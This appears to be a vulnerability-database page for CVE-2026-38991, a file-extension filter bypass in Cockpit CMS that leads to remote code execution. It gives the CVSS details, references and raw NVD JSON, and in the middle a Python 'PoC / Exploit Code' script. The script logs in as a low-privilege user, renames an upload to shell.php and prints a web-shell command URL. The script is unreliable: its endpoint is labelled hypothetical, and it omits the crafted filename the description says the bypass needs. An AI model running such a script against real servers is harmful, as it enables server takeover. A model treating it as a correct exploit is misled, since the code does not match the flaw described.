CVE-2026-38991

Description

Cockpit 2.13.5 and earlier is affected by a misconfiguration within the Bucket component _isFileTypeAllowed function where a specially crafted filename bypasses an extension filter. This allows an authenticated attacker to rename arbitrary files with the .php file extension enabling arbitrary code to be executed on the underlying server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cockpit CMS <= 2.13.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://localhost:8080"
login_url = f"{target_url}/auth/login"
rename_url = f"{target_url}/api/bucket/rename"  # Hypothetical endpoint

# Low privilege credentials
credentials = {
    "user": "lowpriv_user",
    "password": "password123"
}

session = requests.Session()

# 1. Authenticate
print("[+] Attempting login...")
resp = session.post(login_url, json=credentials)
if resp.status_code != 200:
    print("[-] Login failed")
    exit(1)
print("[+] Login successful")

# 2. Exploit: Rename arbitrary file to .php
# Assuming we have a file ID 'image1.png' that we want to turn into a shell
payload = {
    "id": "image1.png",
    "name": "shell.php"  # Vulnerable filter allows this bypass
}

print("[+] Sending malicious rename request...")
exploit_resp = session.post(rename_url, json=payload)

if exploit_resp.status_code == 200:
    print(f"[+] Exploit success! Access shell at: {target_url}/storage/uploads/shell.php?cmd=whoami")
else:
    print(f"[-] Exploit failed. Status: {exploit_resp.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-38991
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-38991
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-38991/
[4] VulDB https://vuldb.com/cve/CVE-2026-38991
[5] https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/
[6] https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0
[7] https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-38991", "sourceIdentifier": "[email protected]", "published": "2026-04-29T16:16:23.797", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cockpit 2.13.5 and earlier is affected by a misconfiguration within the Bucket component _isFileTypeAllowed function where a specially crafted filename bypasses an extension filter. This allows an authenticated attacker to rename arbitrary files with the .php file extension enabling arbitrary code to be executed on the underlying server."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/", "source": "[email protected]"}, {"url": "https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0", "source": "[email protected]"}, {"url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}